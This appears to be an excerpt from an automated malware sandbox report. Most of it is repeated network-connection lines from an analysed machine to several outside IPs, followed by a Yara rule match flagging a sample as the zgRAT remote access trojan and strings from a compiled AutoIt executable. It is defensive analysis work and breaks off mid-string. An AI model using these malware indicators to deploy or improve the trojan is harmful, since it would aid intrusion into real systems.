Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.6:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.6:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.6:50170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.6:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50260 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE

Matched rule: Detects zgRAT Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: dfa5c95181.exe, 0000000B.00000000.3064747252.0000000000CB2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_9a26232d-4
Source: dfa5c95181.exe, 0000000B.00000000.3064747252.0000000000CB2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 